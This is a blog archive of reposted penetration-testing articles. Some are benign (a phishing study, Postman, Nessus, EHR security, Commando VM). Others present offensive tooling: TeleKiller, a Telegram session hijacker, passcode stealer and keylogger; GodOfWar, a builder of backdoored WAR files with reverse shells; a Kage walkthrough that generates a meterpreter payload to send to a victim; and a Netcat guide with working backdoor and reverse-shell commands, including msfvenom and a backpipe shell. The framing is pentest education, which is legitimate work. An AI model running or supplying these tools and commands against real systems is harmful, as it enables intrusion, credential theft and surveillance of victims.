Category Archives: penetration testing

Spear Phishing Report Card: Perfect Scores in School Security Pen Testing

In a new U.K.-based study, 100 percent of test spear phishing attacks gained access to sensitive university data in less than two hours.

That’s the word from joint efforts by nonprofit research firm Jisc and the U.K.’s Higher Education Policy Institute (HEPI), which evaluated 173 higher education providers recently. As noted by We Live Security/ESET, researchers were able to “reach student and staff personal information, override financial systems and access research databases,” often in less than an hour. Jisc also achieved perfect scores in breaching security when spear phishing was part of the test attack.

For Your Immediate Attention

Well-designed phishing attacks worked against both students and staff. The Jisc/HEPI report noted that “particularly at the start of the academic year, there has been an increase in student grant fraud.” In this type of attack, students receive emails promising free grant money if they supply banking details or click through to malicious attachments.

Staff members, meanwhile, are often sent supposedly urgent documents they need to unlock using university credentials, effectively giving attackers unfettered network access. Using available social data and published department structures on university websites enabled white-hat hackers to create custom-built emails that bypassed security at every participating institution.

It’s also worth noting that post-secondary distributed denial-of-service (DDoS) attacks are on the rise. In 2018, HEPI reported more than 1,000 DDoS attacks across 241 U.K. education and research facilities. These attacks are doubly concerning: As Jisc noted, data availability is critical to school success, especially during “clearing,” which sees unfilled university spaces matched with new student candidates.

Inability to access course or applicant data during this time could be financially and reputationally devastating. In addition, DDoS attacks are often used to mask other threat vectors. For example, a high-volume DDoS attack could increase the efficacy of spear phishing efforts by shifting security focus away from email compromise.

Avoiding the Hook of Spear Phishing

While higher learning institutions were the target industry in Jisc’s study, the lesson is applicable at scale: Well-written phishing emails are corporate compromise kryptonite.

Avoiding the spear phishing hook starts with recognizing the critical link between employees and email. Most users believe they’re above average when it comes to recognizing the danger signs of phishing, but this doesn’t pan out in practice. By implementing low-key warning processes that recognize key phishing tactics, companies can ensure staff are notified without fighting the “it won’t happen to me” battle.

IBM security experts also recommend implementing identity and access management (IAM) solutions that leverage user behavior analytics (UBA) to identify normal user behaviors and sound the alarm if strange access requests or odd resource use patterns emerge.

The post Spear Phishing Report Card: Perfect Scores in School Security Pen Testing appeared first on Security Intelligence.

TeleKiller – A Tool Session Hijacking And Stealer Local Passcode Telegram Windows


A Tools Session Hijacking And Stealer Local passcode Telegram Windows.

Features :
  • Session Hijacking
  • Stealer Local Passcode
  • Keylogger
  • Shell
  • Bypass 2 Step Verification
  • Bypass Av (Coming Soon)

Installation Windows
git clone https://github.com/ultrasecurity/TeleKiller.git
cd TeleKiller
pip install -r requirements.txt
python TeleKiller.py

Dependency :
  • python 2.7
  • pyHook
  • pywin32

Video Tutorial


Operating Systems Tested
  • Windows 10
  • Windows 8.1
  • Windows 8
  • Windows 7

Contact

Thanks to
Milad Ranjbar
MrQadir


GodOfWar – Malicious Java WAR Builder With Built-In Payloads


A command-line tool to generate war payloads for penetration testing / red teaming purposes, written in ruby.
Features
  • Preexisting payloads. (try -l/--list)
    • cmd_get
    • filebrowser
    • bind_shell
    • reverse_shell
    • reverse_shell_ui
  • Configurable backdoor. (try --host/-port)
  • Control over payload name.
    • To avoid malicious name after deployment to bypass URL name signatures.

Installation
$ gem install godofwar

Usage
$ godofwar -h 

Help menu:
-p, --payload PAYLOAD Generates war from one of the available payloads.
(check -l/--list)
-H, --host IP_ADDR Local or Remote IP address for the chosen payload
(used with -p/--payload)
-P, --port PORT Local or Remote Port for the chosen payload
(used with -p/--payload)
-o, --output [FILE] Output file and the deployment name.
(default is the payload original name. check '-l/--list')
-l, --list list all available payloads.
-h, --help Show this help message.

Example
List all payloads
$ godofwar -l
├── cmd_get
│   └── Information:
│ ├── Description: Command execution via web interface
│ ├── OS: any
│ ├── Settings: {"false"=>"No Settings required!"}
│ ├── Usage: http://host/cmd.jsp?cmd=whoami
│ ├── References: ["https://github.com/danielmiessler/SecLists/tree/master/Payloads/laudanum-0.8/jsp"]
│ └── Local Path: /var/lib/gems/2.5.0/gems/godofwar-1.0.1/payloads/cmd_get
├── filebrowser
│   └── Information:
│ ├── Description: Remote file browser, upload, download, unzip files and native command execution
│ ├── OS: any
│ &#9500 ;── Settings: {"false"=>"No Settings required!"}
│ ├── Usage: http://host/filebrowser.jsp
│ ├── References: ["http://www.vonloesch.de/filebrowser.html"]
│ └── Local Path: /var/lib/gems/2.5.0/gems/godofwar-1.0.1/payloads/filebrowser
├── bind_shell
│   └── Information:
│ ├── Description: TCP bind shell
│ ├── OS: any
│ ├── Settings: {"port"=>4444, "false"=>"No Settings required!"}
│ ├── Usage: http://host/reverse-shell.jsp
│ ├── References: ["Metasploit - msfvenom -p java/jsp_shell_bind_tcp"]
│ └ ── Local Path: /var/lib/gems/2.5.0/gems/godofwar-1.0.1/payloads/bind_shell
├── reverse_shell_ui
│   └── Information:
│ ├── Description: TCP reverse shell with a HTML form to set LHOST and LPORT from browser.
│ ├── OS: any
│ ├── Settings: {"host"=>"attacker", "port"=>4444, "false"=>"No Settings required!"}
│ ├── Usage: http://host/reverse_shell_ui.jsp
│ ├── References: []
│ └── Local Path: /var/lib/gems/2.5.0/gems/godofwar-1.0.1/payloads/reverse_shell_ui
├── reverse_shell
│   └── Information:
│ ├── De scription: TCP reverse shell. LHOST and LPORT are hardcoded
│ ├── OS: any
│ ├── Settings: {"host"=>"attacker", "port"=>4444, "false"=>"No Settings required!"}
│ ├── Usage: http://host/reverse_shell.jsp
│ ├── References: []
│ └── Local Path: /var/lib/gems/2.5.0/gems/godofwar-1.0.1/payloads/reverse_shell
Generate payload with LHOST and LPORT
godofwar -p reverse_shell -H 192.168.100.10  -P 9911 -o puppy
After deployment, you can visit your shell on (http://host:8080/puppy/puppy.jsp)

Contributing
  1. Fork it ( https://github.com/KINGSABRI/godofwar/fork ).
  2. Create your feature branch (git checkout -b my-new-feature).
  3. Commit your changes (git commit -am 'Add some feature').
  4. Push to the branch (git push origin my-new-feature).
  5. Create a new Pull Request.

Add More Backdoors
To contribute by adding more backdoors:
  1. create a new folder under payloads directory.
  2. put your jsp file under the newly created directory (make it the same directory name).
  3. update payloads_info.json file with
    1. description.
    2. supported operating system (try to make it universal though).
    3. configurations: default host and port.
    4. references: the payload origin or its creator credits.


Better API Penetration Testing with Postman – Part 3

In Part 1 of this series, we got started with Postman and generally creating collections and requests. In Part 2, we set Postman to proxy through Burp Suite, so that we could use its fuzzing and request tampering facilities. In this part, we will dig into some slightly more advanced functionality in Postman that you almost certainly want to leverage.

Collection Variables

Variables in Postman can be used in almost any field in the request. The syntax is to use double curly-braces on either side of them. There are a few places I can define them. If they’re relatively static, maybe I set them as collection variables. For example, I’ve been using http://localhost:4000 as my test host. If I change the test API’s port from 4000 to 4001, I don’t want to have to edit the URL of each request. Here’s how move that into a Collection variable. First, I open the edit dialog for that collection on the Collections list in the menu side-bar. I can either click the ... button or I can right click the collection name itself. In either case, I get the same context menu, and I want to choose Edit.

This will open a dialog for editing the collection. The default view has the name of the collection and a description textbox, but there’s also a row of tabs between those two fields.

One of those tabs is called Variables. That’s the one we want, and click it will open another dialog, for editing variables.

Postman collection variable editing interface

It has a grid containing a Variable column for the variable name, and Initial Value column, and a Current Value column. The differences between those two value columns relate to syncing through Postman’s paid features. What matters here is that you will enter the initial value, and then tab into the current value field. This will automatically populate the current initial value into the current value field, and it will look as pictured. Now I have a collection variable called api_host, with a value of http://localhost:4000. I’m done editing variables, so I click the Update button.

It’s time to modify my requests to reference that variable instead of having their own hard-coded hostname and port.

Postman request, with the URL changed to point to a variable

I simply replace the applicable part of each URL with the placeholder: {{api_host}}
Hovering over the placeholder will expand it to tell me the value and scope. There’s some color-coding here to help us out too. The text turns orange when it’s valid, but would be red if I put an invalid variable name in.

I still have to update each request this once, to make them use the variable. But in the future, if it changes port, if it switches to HTTPS, or if I deploy my test API to a completely different host; I can just go back into my collection variables and update the values in there, and my requests will all receive the change accordingly.

Now collection variables are fine for relatively static bits that won’t change much, but what if I’m testing multiple environments, deployments, or even multiple tenants in a multi-tenant solution? It’s likely I’ll want to use the same collection of requests but with different sets of variables. Environment Variables deal with that problem.

Environment Variables

You may have already noticed their interface on the top-right of the window. Let’s take a look:

Environment variable interface in Postman
  1. Environment selector drop-down. It drops down to select an environment.
  2. Quick-look button, to take a peek at what’s set in your environment
  3. Manage Environments button, where the real editing happens.


To get started, we’ll want to click the Manage Environments button. That will open a large, but relatively empty dialog, with an Add button at the bottom. Click the Add button.

You will be presented with another dialog. This one looks almost the same as the Collection Variables dialog, except that it takes a name.

I’ve named mine LocalTest.

I’ve also added too variables, one called bearer_token, with a value of foo. The other called user_id with a value of 1.

Once I’ve finished editing, I click the Add button near the bottom of the dialog, and then close out of the Manage Environments dialog. There’s one final, important, oft-forgotten step before I can use the variable in this environment. I need to choose it from the Environment selector drop-down.

And now these additional variables are accessible in the same way as the api_host was above: {{bearer_token}} and {{user_id}}

Route Parameters

It’s common on modern APIs to use route parameters. Those are values supplied as part of the main path on the URL. For example, consider the following: http://localhost:4000/user/42/preferences

The number 42 in a URL like that is actually a parameter, most likely a user ID in this example. When the server-side application routes the incoming request, it will extract that value and make it readily available to the function or functions that ultimately handle the request and construct the response. This is a route parameter. It may be convenient to make this easily editable or Postman. The syntax for that is simply to put it directly into the URL in the form of a colon (:) followed by the parameter name. For this example request in Postman, I would enter it as {{api_host}}/user/:userId/preferences. Then, on the Params tab of the request, I can see it listed and set its value. In the image below, I set it to the user_id variable that I specified in the environment variables earlier.

I could have written my variable directly into the URL as well, but this way is cleaner, in my opinion.

Bearer Tokens

Imagine a scenario where you issue some sort of auth request, it responds with a bearer token, and then you need to use that token in all of your other requests. The manual way to do it would probably be to just issue the auth request, and then copy and paste the token from the response into an environment variable. All the other requests can then use that environment variable.

That will work okay, but it can be a pain if you have a token with a short lifespan. There’s a more elegant solution to this problem. Consider the following response:

We’ve issued our request and received a JSON response containing our token. Now I want to automate the process of updating my environment variable with the new bearer token. On the requests interface, there are several tabs. The one furthest to the right is called Tests. This is mainly for automatically examining the response to determine if the API is broken, like a unit test. But we can abuse it for our purpose with just a couple JavaScript statements.

I add the script above, click Save, and then run my request again. And it appears that everything happened exactly the same as the first time. But if I use the Quick Look button to see my environment variables…

I can see that the Current Value has been updated automatically. That’s the first step – I now have the value stored in a place that I can easily reference, but it doesn’t put that Bearer token on my requests for me. I have two options for that. The first option is that if I got to the request’s Authorization tab, I can set a bearer token from the type drop-down, and point it at my variable.

This approach is alright, but then I need to remember to set it on each request. But the default Authorization Type on each new request is Inherit auth from parent. The parent, in this case, is the Collection. So if I switch this request back to that default type, I can then go into the Edit Collection settings (same context menu as I went to for Collection variables), and go to the Collection’s Authorization tab.

It presents almost the same interface as the Authorization on the request, and I can set it the same way. The difference now is that it’s managed in one place – in the collection. And every new request I create will include that bearer token by default, unless I specifically change the type on that request. For example, my Authentication request likely doesn’t need the bearer token, so I might then set the type to No Auth on that request’s Authorization tab.

Occasionally, I run into applications where an XML or HTML body is returned containing the value that I want to extract. In those cases, the xml2Json function, which is built-in, is helpful for parsing the response.

Using xml2Json to marshall an HTML body into a JSON object

As one more note – the is the Pre-request Script tab, which uses the same basic scripting interface. As you might expect, it executes before the request is sent. I know some of my colleagues use it to set the Bearer tokens, which is a totally valid strategy, just not the approach I use. It can also be helpful where you need a nonce, although that’s again not something I typically encounter.

Next Steps

In Part 4, we will wrap up the series by incorporating some Burp Suite extensions to really power-up our penetration testing tool-chain. But this whole series is really dealing with tooling. There is a lot of background knowledge that can be a huge difference-maker for API testing, from a good understanding of OAuth, to token structures like JWT and SAML, to a really good understanding of CORS.

Beginner’s Guide to Nessus

In this article, we will learn about Nessus which is a network vulnerability scanner. There are various network vulnerability scanners but Nessus is one of the best because of its most successful GUI. Therefore, it is widely used in multiple organizations. The tools were developed by Renuad Deraison in the year 1998.

Table of Content

  • Introduction to Nessus
  • Linux Installation
  • Running Vulnerability Scans
  • Windows Installation

Introduction to Nessus

Nessus is an open-source network vulnerability scanner that utilizes the Common Vulnerabilities and Exposures engineering for simple cross-connecting between agreeable security instruments. Nessus utilizes the Nessus Attack Scripting Language (NASL), a basic language that portrays singular dangers and potential assaults. Nessus has a measured design comprising of incorporated servers that direct examining, and remote customers that take into account chairman communication. Executives can incorporate NASL portrayals of every presumed powerlessness to create altered outputs. Noteworthy abilities of Nessus include:

  • Compatible with all OS
  • Scans for vulnerabilities in the local and remote host
  • Informs about missing security in detail
  • Applies various attacks in order to pinpoint a vulnerability
  • It can schedule security audits
  • Runs security tests

Linux Installation

Let’s start the installation on Linux. Here we are installing Nessus on an Ubuntu 18 Machine. Firstly, we will invoke a root shell using sudo bash command. We are going to install Nessus using a deb file that can be downloaded from the Nessus Official Website. We traverse to the directory where we have downloaded the deb file. We will change permission to execute the file and then we will install the Nessus.deb file using the dpkg command.

chmod 777 Nessus-8.2.3-ubuntu910_amd64.deb
dpkg -I Nessus*.deb

Afterwards, as shown in the image using the following command to run Nessus :

/etc/init.d/nessusd start

This command will open our default browser, which in our case is Mozilla Firefox. And we will be greeted with a Warning about Certificate Installation. To use Nessus, we will have to get through this warning. The first click on Advanced followed by Accept the Risk and Continue.

Then it will ask you to create an account, as shown in the image, give the details for it.

Further, it will ask you for an activation code, provide that just as its shown in the image below :

Once all the formalities are done, Nessus will open and will allow you to perform any scan you desire as shown in the image below :

Running Vulnerability Scans

When you click on create new scans, there will be multiple scans that you can see in the following image :

And then in the policies tab, you can generate different policies on which the scans are based.

There are various policies templates too, as shown in the image below :

In order to start a new scan, go to scan templates and select a new scan and then give it a name and target IP as shown in the following image :

Once the scan is done, it will show you the result; this result will clearly indicate the risk that a vulnerability poses which goes from low to critical.

When you click on the vulnerability, for instance here we clicked on the first one which is a critical threat, it will give you details about vulnerability such as its severity, whether its RPC or not, its version, etc. as shown in the image below :

Now, we clicked on the different one which is a high-level threat, it will give you details about vulnerability such as its severity, whether its RPC or not, its version, etc. as shown in the image below :

Windows Installation

Download Nessus for windows from Nessus Official Website. And open it similarly in the browser to set it up.

Just like in Linux, we will be greeted with a Warning about Certificate Installation. To use Nessus, we will have to get through this warning. First click on Advanced followed by Accept the Risk and Continue.

Then it will ask you to create an account, as shown in the image, give the details for it.

Further, it will ask you for an activation code, provide that just as its shown in the image below :

And then you can start your scans in a similar way just as shown above in Linux.

Author: Shubham Sharma is a Cybersecurity enthusiast and Researcher in the field of WebApp Penetration testing. Contact here

The post Beginner’s Guide to Nessus appeared first on Hacking Articles.

Kage: Graphical User Interface for Metasploit

Kage is a GUI for Metasploit RCP servers. It is a good tool for beginners to understand the working of Metasploit as it generates payload and lets you interact with sessions. As this tool is on the process of developing, till now it only supports windows/meterpreter and android/meterpreter.  For it to work, you should have Metasploit installed in your system. The only dependency it requires is npm.

Installations

Use the following git command to install the kage software :

git clone https://github.com/WayzDev/Kage.git

Go inside the kage folder and install nmp with the following command :

apt-get install npm

Further, use the following command :

npm install

And then run it with the following command :

npm run dev

Once all the perquisites are done, the kage will run. Click on the start server button as shown in the image below :

The server will start running. Once all the process is done, click on the close button as shown in the image below :

After click on the close button, it will automatically take all the details, and then you can click on the connect button to connect as shown in the image below :

Once you are connected, it will show you the following windows :

Under the heading payload generator, you can give all the details such as file name (kage.exe), payload (windows/meterpreter/reverse_tcp), lhost (192.168.1.9), lport (5252) and then click on generate.

After clicking on generate, it will create a new folder named kage (with small k), here, run python server so that you can share your malware with the victim. To run the python server, type :

python -m SimplpeHTTPServer 80

Once the file is shared and executed, it will show the following details under the jobs heading :

And when you go the sessions window through the dashboard, you will find a new session that has been created. Click on interact button to access the session.

After clicking on the interact button, the following window will open. Here, the first tab will show you all the information about the system.

The second tab will show you all the processes that are running on the victim’s PC.

And the third tab will give you all the information about its network. Here, you can use three commands through buttons provided and i.e. ifconfig, netstat, route, as shown in the image below :

Author: Shubham Sharma is a Cybersecurity enthusiast and Researcher in the field of WebApp Penetration testing. Contact here

The post Kage: Graphical User Interface for Metasploit appeared first on Hacking Articles.

Comprehensive Guide on Netcat

This article will provide you with the basic guide of Netcat and how to get a session from it using different methods.

Table of Contents:

  • Introduction
  • Features
  • Getting start with NC
  • Connecting to a Server
  • Fetching HTTP header
  • Chatting
  • Creating a Backdoor
  • Verbose Mode
  • Save Output to Disk
  • Port Scanning
  • TCP Delay Scan
  • UDP Scan
  • Reverse TCP Shell Exploitation
  • Randomize Port
  • File Transfer
  • Reverse Netcat Shell Exploitation
  • Banner grabbing

Introduction to Netcat

Netcat or nc is a utility tool that uses TCP and UDP connections to read and write in a network. It can be used for both attacking and security. In the case of attacking, it can be driven by scripts which makes it quite dependable back-end. and if we talk about security, it helps us to debug the network along with investing it.

Features

  • Act as a simple TCP/UDP/SCTP/SSL client for interacting with web servers, telnet servers, mail servers, and other TCP/IP network services. Often the best way to understand a service (for fixing problems, finding security flaws, or testing custom commands) is to interact with it using Netcat. This lets you control every character sent and view the raw, unfiltered responses.
  • Redirect or proxy TCP/UDP/SCTP traffic to other ports or hosts. This can be done using simple redirection (everything sent to a port is automatically relayed somewhere else you specify in advance) or by acting as a SOCKS or HTTP proxy so clients specify their own destinations. In client mode, Netcat can connect to destinations through a chain of anonymous or authenticated proxies.
  • Run on all major operating systems. We distribute Linux, Windows, and Mac OS X binaries, and Netcat compiles on most other systems. A trusted tool must be available whenever you need it, no matter what computer you’re using.
  • Encrypt communication with SSL, and transport it over IPv4 or IPv6.
  • Act as a network gateway for execution of system commands, with I/O redirected to the network. It was designed to work like the Unix utility cat, but for the network.
  • Act as a connection broker, allowing two (or far more) clients to connect to each other through a third (brokering) server. This enables multiple machines hidden behind NAT gateways to communicate with each other, and also enables the simple Netcat chat mode.

Getting start with NC

To start NC, the most basic option we can use the help command. This will show us all the options that we can use with Netcat. The help command is the following one :

nc -h

Connecting to a Server

Here, we have connected FTP Server with the IP Address 192.168.1.6. To connect to the server at a specific port where a particular service running. In our case, the port is 21 i.e. FTP.

Syntax: nc [Target IP Address] [Target Port]

nc 192.168.1.6 21

As we can see in the given image, we have vsFTPd installed on the server, and after giving the Login credentials we have successfully logged in the FTP Server.

Fetching HTTP header

We can use netcat to fetch information about any webserver. Let’s get back to the server we connected to earlier. It also has HTTP service running on port 80. So, we connected to HTTP service using netcat as we did earlier. Now after connecting to the server, we use the option that will give us the header along with the source code of the HTTP service running on the remote server.

nc 192.168.1.6 80
HEAD/HTTP/1.0

As we can see in the given image that the header and source code is displayed through the netcat connection.

Chatting

Netcat can also be used to chat between two users. We need to establish a connection before chatting. To do this we are going to need two devices. One will play the role of initiator and one will be a listener to start the conversation and so once the connection is established, communication can be done from both ends. Here we are going to create a scenario of chatting between two users with the different operating system.

User 1

OS: Windows 10

IP Address: 192.168.1.4

Role: Listener

User 2

OS: Kali Linux

IP Address: 192.168.1.35

Role: Initiator

Now in each and every scenario, regarding netcat. This step is prominent. First, we will have to create a listener. We will use the following command to create a listener:

nc -lvvp 4444

where,

[-l]: Listen Mode

[vv]: Verbose Mode {It can be used once, but we use twice to be more verbose}

[p]: Local Port

Now, it’s time to create an initiator, for this we will just provide the IP Address of the System where we started the Listener followed by the port number.

NOTE: Use the same port to create an initiator which was used in creating listener

nc 192.168.1.4 4444

Creating a Backdoor

We can also create a backdoor using NC. To create a backdoor on the target system that we can come back to at any time. Command for attacking a Linux System.

nc -l -p 2222 -e /bin/bash

This will open a listener on the system that will pipe the command shell or the Linux bash shell to the connecting system.

nc 192.168.1.35 2222

Verbose Mode

In netcat, Verbose is a mode which can be initiated using [-v] parameter. Now verbose mode generates extended information. Basically, we will connect to a server using netcat two times to see the difference between normal and verbose mode. In the image given below, we can see that when we add [-v] to the netcat command it displays the information about the process that its performance while connecting to the server.

nc 192.168.1.6 21 -v

Save Output to Disk

For the purpose of the record maintenance, better readability and future references, we will save the output of the Netcat. To do this we will use the parameter -o of the Netcat to save the output in the text file.

nc 192.168.1.6 21 -v -o /root/output.txt

Now that we have successfully executed the command, now let’s traverse to the location to ensure whether the output has been saved on the file or not. In this case, our location for output is /root /output.txt.

Port Scanning

Netcat can be used as a port scanner although it was not designed to function as one. To work as a port scanner, we use the [-z] parameter. It tells netcat to scan listing daemon without sending any data. This makes it possible for netcat to understand the type of service that is running on that specific port. Netcat can perform TCP and UDP scan.

TCP Scan

nc -v -n -z -w 2 192.168.1.6 21-1100

Here,

  • [-v]: indicates Verbose mode
  • [-n]: indicates numeric-only IP addresses
  • [-z]: indicates zero -I/O mode [used for scanning]
  • [-w]: indicates timeout for connects and final net reads

Also, to perform a port scan netcat needs a range of port numbers. We can provide a range of ports to scan.

From the given image we can see that the target machine has lots of ports open with various services running on them.

nc -v -n -z -w 2 192.168.1.6 21-1100

TCP Delay Scan

In order to not to be noisy in an environment, it is recommended to use a delayed scan. Now to perform a delayed scan, we need to specify the delay. We will use the [-i] parameter to specify the delay in sending the next packet in seconds.

nc -z -v -i 10 192.168.1.6 21-80

UDP Scan

Netcat can scan the UDP ports in a similar way it scanned the TCP ports. We are going to use [-u] parameter to invoke the UDP mode.

nc -vzu 192.168.1.6 80-90

Reverse TCP Shell Exploitation

We can exploit a system using a combination of msfvenom and netcat. We will use msfvenom to create a payload and netcat to listen for the session. Firstly, we will have to create a payload.

msfvenom -p windows/shell_reverse_tcp lhost=192.168.1.35 lport=2124 -f exe > /root/Desktop/1.exe

We are using the shell_reverse_tcp payload to get a session. We have provided with Local IP address and port and then exported the script inside an Executable(exe) file. Now we will create a listener using netcat on the port we provided during the payload creation. We will now have to send the payload file to the target. When the target will run the executable file, we will get a session on our netcat listener.

nc -lvvp 2124

Randomize Port

If we can’t decide our very own port to start listener or establish our Netcat connection. Well, netcat has a special -r parameter for us which gives us randomize local port.

nc -lv -r

File Transfer

Netcat can be used to transfer the file across devices. Here we will create a scenario where we will transfer a file from a windows system to Kali Linux system. To send the file from the Windows, we will use the following command.

nc -v -w 30 -p 8888 -l < C:\netcat\output.txt

Now we will have to receive the file shared on Kali Linux. Here we will provide netcat with the Windows IP Address and the port which hosts the file. And write the output inside a text file. For doing this we will use the following command:

nc -v -w 2 192.168.1.4 8888 > output.txt

Reverse Netcat Shell Exploitation

We will use msfvenom to create a payload and netcat to listen for the session. Firstly, we will have to create a payload.

msfvenom -p cmd/unix/reverse_netcat lhost=192.168.1.35 lport=6666 R

So, when you execute the above command; you will get another command that has to be run in the target system, as shown in the image below, you will have your session as shown in the image above.

Another way to have a reverse shell is by executing the following command in the target system :

mknod /tmp/backpipe p

/bin/sh 0</tmp/backpipe | nc 192.168.1.35443 1>/tmp/backpipe

And then when you start netcat as shown in the image below, you will have a session.

Banner Grabbing

To grab the target port banner from netcat, use the following command :

nc -v 192.168.1.2 22

So, this was a basic guide to netcat. It’s quite an interesting tool to use as well as it is pretty easy.

Author: Shubham Sharma is a Cybersecurity enthusiast and Researcher in the field of WebApp Penetration testing. Contact here

The post Comprehensive Guide on Netcat appeared first on Hacking Articles.

The US Is Slow to Adopt EHRs, But That Might Actually Be a Good Thing for Healthcare Security

The healthcare industry is moving toward the universal use of electronic health records (EHRs), digital documentation that represents a secure record of our complete health history. With EHRs, your healthcare provider gets real-time access to your relevant medical data, enabling them to make faster and more accurate treatment decisions.

But all this data has to be stored somewhere. It’s no secret that the healthcare industry is hit hardest when it comes to data breaches, and healthcare security is going to play a huge role if the utopian vision of a purely digital ecosystem is to be realized.

In some countries, however, the medical system is already well on its way to becoming fully digital. In Sweden, for example, 41 percent (about 4.1 million) of the population had already created their own account to use personal e-services on the country’s online portal by June 2017, according to Philips. And in Canada, there are private initiatives to facilitate the EHR process by providing Canadians secure access to their health records.

So why is the U.S. not moving as quickly to adopt a digital system? There are many reasons for this reluctance — some political, some ethical and some based on the sheer number of healthcare providers and the population.

Still, cybersecurity may be the most critical factor. Perhaps incidents such as the flaw that left 170,000 hours of 2.7 million medical calls exposed online for six years in Sweden are prompting us to take our time.

Two Nations, Two Disparate Health Ecosystems

To get an idea of where the U.S. may be headed, we can look to Canada, a country with an estimated population of around 37 million. There, the Toronto-based Dot Health already has relationships with 3,000 healthcare providers across the country and provides an app for Canadians to display their health information in one place. The app updates data whenever it changes and the company goes over and above to secure it. How it protects the data is paramount, but we’ll address this later on.

In Canada, each province and territory is responsible for organizing and delivering health services and supervising providers. This territorial split represents the largest stumbling block for companies like Dot Health that want to be a catalyst for a fully digital system.

“If [healthcare] was federally done, it would be very different,” said Huda Idrees, founder and CEO of Dot Health. “It makes it really difficult when it seems each of the provinces is trying to compete with each other.”

Idrees explained that while a fully digital healthcare system in Canada may have its own set of challenges, the U.S. faces a particularly bumpy road ahead.

“Going digital [in the U.S.] is especially difficult in healthcare, where it’s completely out-of-pocket,” Idrees said. “There are very difficult innovations around EHR, and providers may not want to talk to each other because they have business interests that are in conflict.”

Surpassing Healthcare Security Standards

When it comes to data, the most coveted for threat actors is probably that which comes from the healthcare industry. Understandably, Idrees gets a lot of questions about security, privacy and information protection — a core focus for her company from the very beginning. For Dot Health, security must not only be much better than the healthcare providers, but strive for excellence in data protection to exceed standards in any industry, let alone healthcare.

To achieve this on a technical level, one example Idrees provided is in how they store health records. Instead of monolithic databases, the company spreads data over several databases that contain bits and pieces of what makes up a whole electronic health record.

“You would need to breach 12 different databases and also have the patient’s own login key in order to decipher one complete health record,” Idrees said.

Before going live, Dot Health spent eight months with third-party security specialists to help ensure compliance with all related legislation. On top of that, the company undergoes penetration testing from a third-party vendor three times a year.

In writing about healthcare security, I’ve learned that, unfortunately, pen testing rarely occurs that frequently for healthcare companies. But shouldn’t it, especially when providers are protecting our most sensitive health data?

Not So Fast, We Still Have Work to Do

Perhaps we’re getting ahead of ourselves. Before healthcare data becomes completely digital — or even partially digital — the industry has to be prepared for change. Independent security researcher Rod Soto said that healthcare in the U.S. has a long way to go before going all-in on EHRs.

“Although government regulation has helped to move [the industry] in the digital direction, the evolution of technology and standards sometimes goes faster than the speed of the industry’s willingness to keep up,” Soto said. “This situation where many of the acquired technologies quickly become outdated or obsolete does not match the conservative mindset of the healthcare industry, [and] pushes many organizations to just wait or simply not embrace digital transformation.”

The seemingly endless news about successful breaches and destructive attacks against healthcare institutions doesn’t help, either. So is there any sort of shift that needs to happen to turn the tide?

According to Soto, while a shift may occur, it won’t be anytime soon. “The healthcare industry is known for dealing with significant amounts of legacy, outdated, unmanaged and unpatched systems,” he said. “Malicious actors know this and actively target healthcare organizations.”

Threat actors know the value of the information those systems hold. Because they’ve had success with past breaches, they understand these institutions will pay a ransom if pressed and, if not, they can easily sell the information on the dark web.

Why We Should Wait to Go All-In on EHRs

This may be belaboring the obvious, but we need to be more proactive in keeping systems up to date and patching them to reduce the attack surface.

“That includes more manpower and stricter security controls,” Soto said. “I notice that a lot of the attacks on those organizations usually come from outdated, unmanaged systems.”

Soto does not recommend going fully digital without having a hard copy of records or an off-site backup.

“As antiquated as it may sound, in many instances, where either outages, destructive crimeware or ransomware campaigns have been successful, the hard copy and off-site backups have helped the affected organizations,” he added.

It sure seems like we need to take our time before transitioning to electronic health records. Given the current healthcare breach statistics — more than 2 million healthcare records were compromised in February 2019 alone, a 330 percent increase from January, according to HIPAA Journal — sitting back and watching how the transformation plays out in other countries may be the most prudent strategy.

In the meantime, those in the health industry should follow the Department of Health and Human Services’ cybersecurity guidelines for the healthcare sector, where professionals can share healthcare security best practices to mitigate risk and boost cybersecurity programs across the industry.

The post The US Is Slow to Adopt EHRs, But That Might Actually Be a Good Thing for Healthcare Security appeared first on Security Intelligence.

FireEye’s “Commando VM” Turns Your Windows PC Into Hacking Machine

FireEye’s Commando VM Turns Your Windows Computer Into A Hacking Machine

Cybersecurity company FireEye recently released an automated installation script called Complete Mandiant Offensive VM (“Commando VM”) aimed at penetration testers and red teamers.

According to the company, Commando VM is a “first of its kind Windows-based security distribution for penetration testing and red teaming.” This automation installation script turns a Windows operating system into a hacking system.

FireEye says that Commando VM originated from their company’s popular Flare VM that focuses on reverse engineering and malware analysis platform.

FireEye's “Commando VM” Allows You To Hack Using Your Windows PC

“Penetration testers commonly use their own variants of Windows machines when assessing Active Directory environments. Commando VM was designed specifically to be the go-to platform for performing these internal penetration tests.” reads the post published by FireEye.

“The benefits of using a Windows machine include native support for Windows and Active Directory, using your VM as a staging area for C2 frameworks, browsing shares more easily (and interactively), and using tools such as PowerView and BloodHound without having to worry about placing output files on client assets.”

Commando VM uses BoxstarterChocolatey, and MyGet packages to install all software packages, and delivers many tools and utilities to support penetration testing.

Just running a single command automatically updates all hacking software that you have installed.

It also automatically installs more than 140 tools, including Nmap, Wireshark, Covenant, Python, Go, Remote Server Administration Tools, Sysinternals, Mimikatz, Burp-Suite, x64dbg, Hashcat, on your Windows machine.

“With such versatility, Commando VM aims to be the de facto Windows machine for every penetration tester and red teamer,” says Firefox.

There is also full support for Blue teamers, who are involved in the defense of networks and would like to use Command VM. The versatile tool sets included in Commando VM provide blue teams with the tools necessary to audit their networks and improve their detection capabilities.

“With a library of offensive tools, it makes it easy for blue teams to keep up with offensive tooling and attack trends,” adds FireEye.

Commando VM users are advised to run the distribution in a virtual machine (VM), as this eases deployment and provides the ability to revert to a clean state prior to each engagement. The minimum requirements for installation of a Commando VM is 60GB of disk space and 2GB of memory, and the operating system should be Windows 7 Service Pack 1, or Windows 10. However, it allows installing more features in Windows 10.

“We believe this distribution will become the standard tool for penetration testers and look forward to continued improvement and development of the Windows attack platform,” concluded FireEye.

You can download the installation script of Commando VM from GitHub.

Source: FireEye Blog

The post FireEye’s “Commando VM” Turns Your Windows PC Into Hacking Machine appeared first on TechWorm.

Security Affairs: Commando VM – Using Windows for pen testing and red teaming

Commando VM — Turn Your Windows Computer Into A Hacking Machine

FireEye released Commando VM, a Windows-based security distribution designed for penetration testers that intend to use the Microsoft OS.

FireEye released Commando VM, the Windows-based security distribution designed for penetration testing and red teaming.

FireEye today released an automated installer called Commando VM (Complete Mandiant Offensive  VM), it is an automated installation script that turns a Windows operating system into a hacking system. The installation script works on systems running on a virtual machine (VM) or even on the base system.

